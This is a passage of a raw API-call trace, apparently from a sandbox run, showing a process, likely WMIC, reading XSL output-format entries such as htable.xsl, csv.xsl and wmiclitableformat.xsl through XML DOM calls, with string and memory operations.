wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0308.321] malloc (_Size=0xc) returned 0x35198f8 [0308.321] malloc (_Size=0xc) returned 0x3519910 [0308.321] SysStringLen (param_1="VALUE") returned 0x5 [0308.321] SysStringLen (param_1="TABLE") returned 0x5 [0308.321] SysStringLen (param_1="TABLE") returned 0x5 [0308.321] SysStringLen (param_1="VALUE") returned 0x5 [0308.321] malloc (_Size=0x18) returned 0x3512c88 [0308.321] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.321] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.321] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.321] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=2, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.322] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="textvaluelist.xsl") returned 0x0 [0308.322] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.322] malloc (_Size=0xc) returned 0x3519898 [0308.322] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.322] free (_Block=0x3519898) [0308.322] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0308.322] malloc (_Size=0xc) returned 0x3519898 [0308.322] malloc (_Size=0xc) returned 0x3519928 [0308.322] SysStringLen (param_1="LIST") returned 0x4 [0308.322] SysStringLen (param_1="TABLE") returned 0x5 [0308.322] malloc (_Size=0x18) returned 0x3512c28 [0308.322] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.322] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.322] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.322] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=3, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.323] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="rawxml.xsl") returned 0x0 [0308.323] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.323] malloc (_Size=0xc) returned 0x3519820 [0308.323] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.323] free (_Block=0x3519820) [0308.323] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0308.323] malloc (_Size=0xc) returned 0x3519940 [0308.323] malloc (_Size=0xc) returned 0x35198b0 [0308.323] SysStringLen (param_1="RAWXML") returned 0x6 [0308.323] SysStringLen (param_1="TABLE") returned 0x5 [0308.323] SysStringLen (param_1="RAWXML") returned 0x6 [0308.323] SysStringLen (param_1="LIST") returned 0x4 [0308.323] SysStringLen (param_1="LIST") returned 0x4 [0308.323] SysStringLen (param_1="RAWXML") returned 0x6 [0308.323] malloc (_Size=0x18) returned 0x3512c48 [0308.323] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.323] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.323] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.323] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=4, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.324] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="htable.xsl") returned 0x0 [0308.324] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.324] malloc (_Size=0xc) returned 0x35198c8 [0308.324] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.324] free (_Block=0x35198c8) [0308.324] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0308.324] malloc (_Size=0xc) returned 0x3519850 [0308.324] malloc (_Size=0xc) returned 0x35199b8 [0308.324] SysStringLen (param_1="HTABLE") returned 0x6 [0308.324] SysStringLen (param_1="TABLE") returned 0x5 [0308.324] SysStringLen (param_1="HTABLE") returned 0x6 [0308.324] SysStringLen (param_1="LIST") returned 0x4 [0308.324] malloc (_Size=0x18) returned 0x3512a88 [0308.324] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.324] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.324] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.324] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=5, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.325] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="hform.xsl") returned 0x0 [0308.325] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.325] malloc (_Size=0xc) returned 0x35198c8 [0308.325] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.325] free (_Block=0x35198c8) [0308.325] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0308.325] malloc (_Size=0xc) returned 0x3519808 [0308.325] malloc (_Size=0xc) returned 0x35198c8 [0308.325] SysStringLen (param_1="HFORM") returned 0x5 [0308.325] SysStringLen (param_1="TABLE") returned 0x5 [0308.325] SysStringLen (param_1="HFORM") returned 0x5 [0308.325] SysStringLen (param_1="LIST") returned 0x4 [0308.325] SysStringLen (param_1="HFORM") returned 0x5 [0308.325] SysStringLen (param_1="HTABLE") returned 0x6 [0308.325] malloc (_Size=0x18) returned 0x3512a68 [0308.325] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.325] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.325] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.325] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=6, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.326] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="xml.xsl") returned 0x0 [0308.326] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.326] malloc (_Size=0xc) returned 0x35199a0 [0308.326] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.326] free (_Block=0x35199a0) [0308.326] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0308.326] malloc (_Size=0xc) returned 0x3519970 [0308.326] malloc (_Size=0xc) returned 0x35198e0 [0308.326] SysStringLen (param_1="XML") returned 0x3 [0308.326] SysStringLen (param_1="TABLE") returned 0x5 [0308.326] SysStringLen (param_1="XML") returned 0x3 [0308.326] SysStringLen (param_1="VALUE") returned 0x5 [0308.326] SysStringLen (param_1="VALUE") returned 0x5 [0308.326] SysStringLen (param_1="XML") returned 0x3 [0308.326] malloc (_Size=0x18) returned 0x3512aa8 [0308.326] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.326] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.326] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.326] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=7, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.327] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="mof.xsl") returned 0x0 [0308.327] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.327] malloc (_Size=0xc) returned 0x3519988 [0308.327] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.327] free (_Block=0x3519988) [0308.327] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0308.327] malloc (_Size=0xc) returned 0x3519988 [0308.327] malloc (_Size=0xc) returned 0x35199a0 [0308.327] SysStringLen (param_1="MOF") returned 0x3 [0308.327] SysStringLen (param_1="TABLE") returned 0x5 [0308.327] SysStringLen (param_1="MOF") returned 0x3 [0308.327] SysStringLen (param_1="LIST") returned 0x4 [0308.327] SysStringLen (param_1="MOF") returned 0x3 [0308.327] SysStringLen (param_1="RAWXML") returned 0x6 [0308.327] SysStringLen (param_1="LIST") returned 0x4 [0308.327] SysStringLen (param_1="MOF") returned 0x3 [0308.327] malloc (_Size=0x18) returned 0x3512d88 [0308.327] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.327] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.327] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.327] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=8, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.328] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="csv.xsl") returned 0x0 [0308.328] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.328] malloc (_Size=0xc) returned 0x35197f0 [0308.328] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.328] free (_Block=0x35197f0) [0308.328] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0308.328] malloc (_Size=0xc) returned 0x35197f0 [0308.328] malloc (_Size=0xc) returned 0x3519820 [0308.328] SysStringLen (param_1="CSV") returned 0x3 [0308.328] SysStringLen (param_1="TABLE") returned 0x5 [0308.328] SysStringLen (param_1="CSV") returned 0x3 [0308.328] SysStringLen (param_1="LIST") returned 0x4 [0308.328] SysStringLen (param_1="CSV") returned 0x3 [0308.328] SysStringLen (param_1="HTABLE") returned 0x6 [0308.328] SysStringLen (param_1="CSV") returned 0x3 [0308.328] SysStringLen (param_1="HFORM") returned 0x5 [0308.328] malloc (_Size=0x18) returned 0x3512b48 [0308.329] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.329] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.329] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.329] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=9, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.329] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="texttable.xsl") returned 0x0 [0308.329] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.329] malloc (_Size=0xc) returned 0x3519838 [0308.329] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.329] free (_Block=0x3519838) [0308.329] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0308.329] malloc (_Size=0xc) returned 0x3519838 [0308.330] malloc (_Size=0xc) returned 0x351ad50 [0308.330] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.330] SysStringLen (param_1="TABLE") returned 0x5 [0308.330] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.330] SysStringLen (param_1="VALUE") returned 0x5 [0308.330] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.330] SysStringLen (param_1="XML") returned 0x3 [0308.330] SysStringLen (param_1="XML") returned 0x3 [0308.330] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.330] malloc (_Size=0x18) returned 0x3512b68 [0308.330] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.330] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.330] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.330] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=10, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.330] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="texttable.xsl") returned 0x0 [0308.330] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.330] malloc (_Size=0xc) returned 0x351ad08 [0308.331] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.331] free (_Block=0x351ad08) [0308.331] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0308.331] malloc (_Size=0xc) returned 0x351adc8 [0308.331] malloc (_Size=0xc) returned 0x351ab88 [0308.331] SysStringLen (param_1="texttablewsys") returned 0xd [0308.331] SysStringLen (param_1="TABLE") returned 0x5 [0308.331] SysStringLen (param_1="texttablewsys") returned 0xd [0308.331] SysStringLen (param_1="XML") returned 0x3 [0308.331] SysStringLen (param_1="texttablewsys") returned 0xd [0308.331] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.331] SysStringLen (param_1="XML") returned 0x3 [0308.331] SysStringLen (param_1="texttablewsys") returned 0xd [0308.331] malloc (_Size=0x18) returned 0x3512ac8 [0308.331] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.331] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.332] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.332] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=11, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.332] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="texttable.xsl") returned 0x0 [0308.332] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.332] malloc (_Size=0xc) returned 0x351ac18 [0308.332] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.332] free (_Block=0x351ac18) [0308.332] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0308.332] malloc (_Size=0xc) returned 0x351ac78 [0308.333] malloc (_Size=0xc) returned 0x351aba0 [0308.333] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.333] SysStringLen (param_1="TABLE") returned 0x5 [0308.333] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.333] SysStringLen (param_1="XML") returned 0x3 [0308.333] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.333] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.333] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.333] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.333] malloc (_Size=0x18) returned 0x35129e8 [0308.333] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.333] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.333] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.333] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=12, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.333] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="texttable.xsl") returned 0x0 [0308.333] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.333] malloc (_Size=0xc) returned 0x351ad20 [0308.334] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.334] free (_Block=0x351ad20) [0308.334] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0308.334] malloc (_Size=0xc) returned 0x351acf0 [0308.334] malloc (_Size=0xc) returned 0x351ab70 [0308.334] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0308.334] SysStringLen (param_1="TABLE") returned 0x5 [0308.334] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0308.334] SysStringLen (param_1="XML") returned 0x3 [0308.334] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0308.334] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.334] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0308.334] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.334] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.334] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0308.334] malloc (_Size=0x18) returned 0x3512bc8 [0308.334] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.334] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.334] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.334] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=13, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.335] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="texttable.xsl") returned 0x0 [0308.335] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.335] malloc (_Size=0xc) returned 0x351ac18 [0308.335] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.335] free (_Block=0x351ac18) [0308.335] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0308.335] malloc (_Size=0xc) returned 0x351abb8 [0308.335] malloc (_Size=0xc) returned 0x351ac18 [0308.335] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.335] SysStringLen (param_1="TABLE") returned 0x5 [0308.335] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.335] SysStringLen (param_1="XML") returned 0x3 [0308.335] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.335] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.335] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.335] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.335] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.335] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.335] malloc (_Size=0x18) returned 0x3512d28 [0308.335] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.335] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.336] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.336] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=14, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.336] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="texttable.xsl") returned 0x0 [0308.336] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.336] malloc (_Size=0xc) returned 0x351ab58 [0308.336] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.336] free (_Block=0x351ab58) [0308.336] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0308.336] malloc (_Size=0xc) returned 0x351abd0 [0308.336] malloc (_Size=0xc) returned 0x351abe8 [0308.336] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0308.336] SysStringLen (param_1="TABLE") returned 0x5 [0308.336] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0308.336] SysStringLen (param_1="XML") returned 0x3 [0308.336] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0308.336] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.336] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0308.336] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.336] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0308.336] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.336] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.337] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0308.337] malloc (_Size=0x18) returned 0x3512a08 [0308.337] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.337] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.337] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.337] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=15, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.337] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="htable.xsl") returned 0x0 [0308.337] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.337] malloc (_Size=0xc) returned 0x351ac00 [0308.337] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.337] free (_Block=0x351ac00) [0308.337] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0308.337] malloc (_Size=0xc) returned 0x351ade0 [0308.337] malloc (_Size=0xc) returned 0x351ab40 [0308.337] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0308.337] SysStringLen (param_1="TABLE") returned 0x5 [0308.337] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0308.338] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.338] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0308.338] SysStringLen (param_1="XML") returned 0x3 [0308.338] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0308.338] SysStringLen (param_1="texttablewsys") returned 0xd [0308.338] SysStringLen (param_1="XML") returned 0x3 [0308.338] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0308.338] malloc (_Size=0x18) returned 0x3512d08 [0308.338] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.338] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.338] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.338] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=16, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.338] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="htable.xsl") returned 0x0 [0308.338] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.338] malloc (_Size=0xc) returned 0x351ac00 [0308.338] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.338] free (_Block=0x351ac00) [0308.338] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0308.338] malloc (_Size=0xc) returned 0x351ad38 [0308.338] malloc (_Size=0xc) returned 0x351ac90 [0308.339] SysStringLen (param_1="htable-sortby") returned 0xd [0308.339] SysStringLen (param_1="TABLE") returned 0x5 [0308.339] SysStringLen (param_1="htable-sortby") returned 0xd [0308.339] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.339] SysStringLen (param_1="htable-sortby") returned 0xd [0308.339] SysStringLen (param_1="XML") returned 0x3 [0308.339] SysStringLen (param_1="htable-sortby") returned 0xd [0308.339] SysStringLen (param_1="texttablewsys") returned 0xd [0308.339] SysStringLen (param_1="htable-sortby") returned 0xd [0308.339] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0308.339] SysStringLen (param_1="XML") returned 0x3 [0308.339] SysStringLen (param_1="htable-sortby") returned 0xd [0308.339] malloc (_Size=0x18) returned 0x3512ae8 [0308.339] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.339] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.339] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.339] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=17, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.339] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="mof.xsl") returned 0x0 [0308.339] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.339] malloc (_Size=0xc) returned 0x351adb0 [0308.339] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.340] free (_Block=0x351adb0) [0308.340] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0308.340] malloc (_Size=0xc) returned 0x351ad68 [0308.340] malloc (_Size=0xc) returned 0x351ad80 [0308.340] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0308.340] SysStringLen (param_1="TABLE") returned 0x5 [0308.340] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0308.340] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.340] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0308.340] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.340] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0308.340] SysStringLen (param_1="wmiclitableformat") 